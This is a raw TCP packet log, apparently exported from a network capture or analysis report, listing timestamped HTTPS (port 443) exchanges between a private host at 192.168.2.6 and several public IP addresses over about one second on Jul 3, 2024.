                                                              Jul 3, 2024 09:41:09.323895931 CEST44362956188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.324042082 CEST62955443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.324047089 CEST44362955188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.324172974 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.324177980 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.324327946 CEST62953443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.324333906 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.324467897 CEST44362955188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.324470997 CEST44362961188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.324490070 CEST44362961188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.324522018 CEST62961443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.324628115 CEST44362959188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.324659109 CEST62952443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.324664116 CEST44362952188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.324693918 CEST62959443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.324724913 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.324727058 CEST44362958188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.324739933 CEST44362958188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.324785948 CEST62958443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.324955940 CEST44362956188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.325011015 CEST62956443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.325046062 CEST44362952188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.325225115 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.325238943 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.325283051 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.326633930 CEST62961443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.326713085 CEST44362961188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.327064037 CEST62955443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.327130079 CEST44362955188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.327486038 CEST62959443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.327545881 CEST44362959188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.327899933 CEST62953443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.327961922 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.328303099 CEST62958443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.328373909 CEST44362958188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.328654051 CEST62956443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.328712940 CEST44362956188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.329061031 CEST62952443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.329152107 CEST44362952188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.329456091 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.329513073 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.329866886 CEST62961443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.329883099 CEST44362961188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.329927921 CEST62955443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.329977989 CEST62959443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.329984903 CEST44362959188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.330245018 CEST62953443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.330256939 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.330291033 CEST62958443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.330302954 CEST44362958188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.330324888 CEST62956443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.330331087 CEST44362956188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.330388069 CEST62952443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.330399036 CEST44362952188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.330637932 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.330643892 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.361771107 CEST443629573.227.135.8192.168.2.6
                                                              Jul 3, 2024 09:41:09.373217106 CEST62959443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.373222113 CEST62958443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.373223066 CEST62961443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.373402119 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.373402119 CEST62956443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.375818014 CEST62957443192.168.2.63.227.135.8
                                                              Jul 3, 2024 09:41:09.375838041 CEST443629573.227.135.8192.168.2.6
                                                              Jul 3, 2024 09:41:09.376496077 CEST44362955188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.376878023 CEST443629573.227.135.8192.168.2.6
                                                              Jul 3, 2024 09:41:09.376938105 CEST62957443192.168.2.63.227.135.8
                                                              Jul 3, 2024 09:41:09.378503084 CEST62957443192.168.2.63.227.135.8
                                                              Jul 3, 2024 09:41:09.378576040 CEST443629573.227.135.8192.168.2.6
                                                              Jul 3, 2024 09:41:09.378799915 CEST62957443192.168.2.63.227.135.8
                                                              Jul 3, 2024 09:41:09.378806114 CEST443629573.227.135.8192.168.2.6
                                                              Jul 3, 2024 09:41:09.419954062 CEST62957443192.168.2.63.227.135.8
                                                              Jul 3, 2024 09:41:09.435771942 CEST4436296013.33.187.68192.168.2.6
                                                              Jul 3, 2024 09:41:09.437215090 CEST62960443192.168.2.613.33.187.68
                                                              Jul 3, 2024 09:41:09.437231064 CEST4436296013.33.187.68192.168.2.6
                                                              Jul 3, 2024 09:41:09.438522100 CEST4436296013.33.187.68192.168.2.6
                                                              Jul 3, 2024 09:41:09.438577890 CEST62960443192.168.2.613.33.187.68
                                                              Jul 3, 2024 09:41:09.440407038 CEST62960443192.168.2.613.33.187.68
                                                              Jul 3, 2024 09:41:09.440471888 CEST4436296013.33.187.68192.168.2.6
                                                              Jul 3, 2024 09:41:09.440653086 CEST62960443192.168.2.613.33.187.68
                                                              Jul 3, 2024 09:41:09.440660954 CEST4436296013.33.187.68192.168.2.6
                                                              Jul 3, 2024 09:41:09.484500885 CEST62960443192.168.2.613.33.187.68
                                                              Jul 3, 2024 09:41:09.485055923 CEST443629573.227.135.8192.168.2.6
                                                              Jul 3, 2024 09:41:09.485125065 CEST443629573.227.135.8192.168.2.6
                                                              Jul 3, 2024 09:41:09.485198975 CEST62957443192.168.2.63.227.135.8
                                                              Jul 3, 2024 09:41:09.485879898 CEST62957443192.168.2.63.227.135.8
                                                              Jul 3, 2024 09:41:09.485899925 CEST443629573.227.135.8192.168.2.6
                                                              Jul 3, 2024 09:41:09.491139889 CEST62962443192.168.2.63.227.135.8
                                                              Jul 3, 2024 09:41:09.491194010 CEST443629623.227.135.8192.168.2.6
                                                              Jul 3, 2024 09:41:09.491254091 CEST62962443192.168.2.63.227.135.8
                                                              Jul 3, 2024 09:41:09.491457939 CEST62962443192.168.2.63.227.135.8
                                                              Jul 3, 2024 09:41:09.491476059 CEST443629623.227.135.8192.168.2.6
                                                              Jul 3, 2024 09:41:09.498569012 CEST62963443192.168.2.6104.26.9.44
                                                              Jul 3, 2024 09:41:09.498594999 CEST44362963104.26.9.44192.168.2.6
                                                              Jul 3, 2024 09:41:09.498752117 CEST62963443192.168.2.6104.26.9.44
                                                              Jul 3, 2024 09:41:09.499552011 CEST62963443192.168.2.6104.26.9.44
                                                              Jul 3, 2024 09:41:09.499563932 CEST44362963104.26.9.44192.168.2.6
                                                              Jul 3, 2024 09:41:09.809427977 CEST44362951188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.809501886 CEST4436296013.33.187.68192.168.2.6
                                                              Jul 3, 2024 09:41:09.809556007 CEST44362951188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.809561014 CEST4436296013.33.187.68192.168.2.6
                                                              Jul 3, 2024 09:41:09.809571028 CEST4436296013.33.187.68192.168.2.6
                                                              Jul 3, 2024 09:41:09.809608936 CEST4436296013.33.187.68192.168.2.6
                                                              Jul 3, 2024 09:41:09.809624910 CEST4436296013.33.187.68192.168.2.6
                                                              Jul 3, 2024 09:41:09.809628963 CEST62951443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.809640884 CEST62960443192.168.2.613.33.187.68
                                                              Jul 3, 2024 09:41:09.809679031 CEST62960443192.168.2.613.33.187.68
                                                              Jul 3, 2024 09:41:09.809685946 CEST44362959188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.809767008 CEST44362958188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.809781075 CEST44362959188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.809803009 CEST44362958188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.809818029 CEST62959443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.809832096 CEST44362958188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.809835911 CEST62958443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.809845924 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.809849977 CEST44362958188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.809878111 CEST44362958188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.809881926 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.809895992 CEST62958443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.809895992 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.809904099 CEST44362958188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.809921980 CEST62953443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.809927940 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.809938908 CEST44362958188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.809946060 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.809950113 CEST62958443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.809964895 CEST62953443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.809966087 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.809973955 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.809988976 CEST44362958188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.809992075 CEST62953443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.809998035 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.810012102 CEST62953443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.810024023 CEST62958443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.810049057 CEST62953443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.810678959 CEST44362955188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.810708046 CEST44362955188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.810743093 CEST44362955188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.810758114 CEST62955443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.810766935 CEST44362955188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.810811996 CEST44362955188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.810832024 CEST62955443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.810859919 CEST62955443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.811357975 CEST44362961188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.811424017 CEST44362961188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.811517000 CEST62961443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.814450026 CEST62951443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.814465046 CEST44362951188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.814765930 CEST62959443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.814779997 CEST44362959188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.815289021 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.815618038 CEST62955443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.815624952 CEST44362955188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.815998077 CEST62961443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.816013098 CEST44362961188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.816703081 CEST62960443192.168.2.613.33.187.68
                                                              Jul 3, 2024 09:41:09.816720009 CEST4436296013.33.187.68192.168.2.6
                                                              Jul 3, 2024 09:41:09.816927910 CEST62958443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.816934109 CEST44362958188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.818638086 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.818684101 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.818721056 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.818743944 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.818753004 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.818782091 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.818805933 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.818826914 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.818833113 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.818844080 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.819169044 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.819200993 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.819211960 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.819217920 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.819256067 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.827194929 CEST44362956188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.827253103 CEST44362956188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.827311039 CEST62956443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.859169006 CEST62953443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.859175920 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.869663954 CEST62956443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.869677067 CEST44362956188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.876555920 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.904632092 CEST62953443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.922033072 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.922039032 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.925559998 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.925601006 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.925646067 CEST62953443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.925652027 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.925731897 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.925745010 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.925784111 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.925787926 CEST62953443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.925792933 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.925846100 CEST62953443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.926641941 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.926697016 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.926754951 CEST62953443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.926764011 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.926824093 CEST62953443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.927082062 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.927144051 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.927186012 CEST62953443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.927191019 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.927876949 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.927896023 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.927932024 CEST62953443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.927937031 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.927992105 CEST62953443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.927995920 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.928358078 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.928384066 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.928404093 CEST62953443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.928410053 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.928462029 CEST62953443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.960148096 CEST443629623.227.135.8192.168.2.6
                                                              Jul 3, 2024 09:41:09.960383892 CEST62962443192.168.2.63.227.135.8
                                                              Jul 3, 2024 09:41:09.960467100 CEST443629623.227.135.8192.168.2.6
                                                              Jul 3, 2024 09:41:09.961515903 CEST443629623.227.135.8192.168.2.6
                                                              Jul 3, 2024 09:41:09.961620092 CEST62962443192.168.2.63.227.135.8
                                                              Jul 3, 2024 09:41:09.962116003 CEST62962443192.168.2.63.227.135.8
                                                              Jul 3, 2024 09:41:09.962177038 CEST443629623.227.135.8192.168.2.6
                                                              Jul 3, 2024 09:41:09.962451935 CEST62962443192.168.2.63.227.135.8
                                                              Jul 3, 2024 09:41:09.962460041 CEST443629623.227.135.8192.168.2.6
                                                              Jul 3, 2024 09:41:09.966686010 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.984797001 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.984838009 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:09.984884024 CEST62953443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:09.984890938 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.000576973 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.000653028 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.000688076 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.000699997 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.000708103 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.000739098 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.000749111 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.000754118 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.000792980 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.000797987 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.001463890 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.001494884 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.001523972 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.001530886 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.001568079 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.001825094 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.001878977 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.001930952 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.001972914 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.001981974 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.002116919 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.002635002 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.002865076 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.002902031 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.002918005 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.002923965 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.002959013 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.002964020 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.018060923 CEST62962443192.168.2.63.227.135.8
                                                              Jul 3, 2024 09:41:10.032324076 CEST62953443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.048115015 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.048122883 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.059254885 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.059290886 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.059303999 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.059319973 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.059530973 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.066587925 CEST44362963104.26.9.44192.168.2.6
                                                              Jul 3, 2024 09:41:10.067598104 CEST62963443192.168.2.6104.26.9.44
                                                              Jul 3, 2024 09:41:10.067614079 CEST44362963104.26.9.44192.168.2.6
                                                              Jul 3, 2024 09:41:10.068828106 CEST44362963104.26.9.44192.168.2.6
                                                              Jul 3, 2024 09:41:10.068905115 CEST62963443192.168.2.6104.26.9.44
                                                              Jul 3, 2024 09:41:10.070053101 CEST62963443192.168.2.6104.26.9.44
                                                              Jul 3, 2024 09:41:10.070118904 CEST44362963104.26.9.44192.168.2.6
                                                              Jul 3, 2024 09:41:10.070362091 CEST62963443192.168.2.6104.26.9.44
                                                              Jul 3, 2024 09:41:10.070369959 CEST44362963104.26.9.44192.168.2.6
                                                              Jul 3, 2024 09:41:10.104324102 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.104382038 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.104460001 CEST62953443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.104477882 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.105442047 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.105513096 CEST62953443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.105515957 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.105561018 CEST62953443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.106018066 CEST62953443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.106034994 CEST44362953188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.111686945 CEST62966443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.111728907 CEST44362966188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.111813068 CEST62966443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.112009048 CEST62966443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.112031937 CEST44362966188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.113910913 CEST62963443192.168.2.6104.26.9.44
                                                              Jul 3, 2024 09:41:10.191026926 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.191097975 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.191123009 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.191159010 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.191169024 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.191195011 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.191206932 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.192051888 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.192059994 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.192106009 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.192112923 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.192142010 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.192184925 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.192190886 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.192610025 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.192651033 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.192656994 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.192696095 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.192738056 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.192744970 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.193584919 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.193629980 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.193645954 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.193655968 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.193696976 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.203583956 CEST62954443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.203608036 CEST44362954188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.207515001 CEST62967443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.207551956 CEST44362967188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.207616091 CEST62967443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.207844019 CEST62967443192.168.2.6188.114.96.3
                                                              Jul 3, 2024 09:41:10.207858086 CEST44362967188.114.96.3192.168.2.6
                                                              Jul 3, 2024 09:41:10.292542934 CEST44362963104.26.9.44192.168.2.6
                                                              Jul 3, 2024 09:41:10.292645931 CEST44362963104.26.9.44192.168.2.6
                                                              Jul 3, 2024 09:41:10.292711020 CEST62963443192.168.2.6104.26.9.44
                                                              Jul 3, 2024 09:41:10.298809052 CEST62963443192.168.2.6104.26.9.44
                                                              Jul 3, 2024 09:41:10.298825026 CEST44362963104.26.9.44192.168.2.6
                                                              Jul 3, 2024 09:41:10.309142113 CEST62968443192.168.2.6104.26.9.44
                                                              Jul 3, 2024 09:41:10.309184074 CEST44362968104.26.9.44192.168.2.6
                                                              Jul 3, 2024 09:41:10.309322119 CEST62968443192.168.2.6104.26.9.44
                                                              Jul 3, 2024 09:41:10.309504986 CEST62968443192.168.2.6104.26.9.44
                                                              Jul 3, 2024 09:41:10.309520960 CEST44362968104.26.9.44192.168.2.6
                                                              Jul 3, 2024 09:41:10.343897104 CEST62969443192.168.2.6104.21.90.167
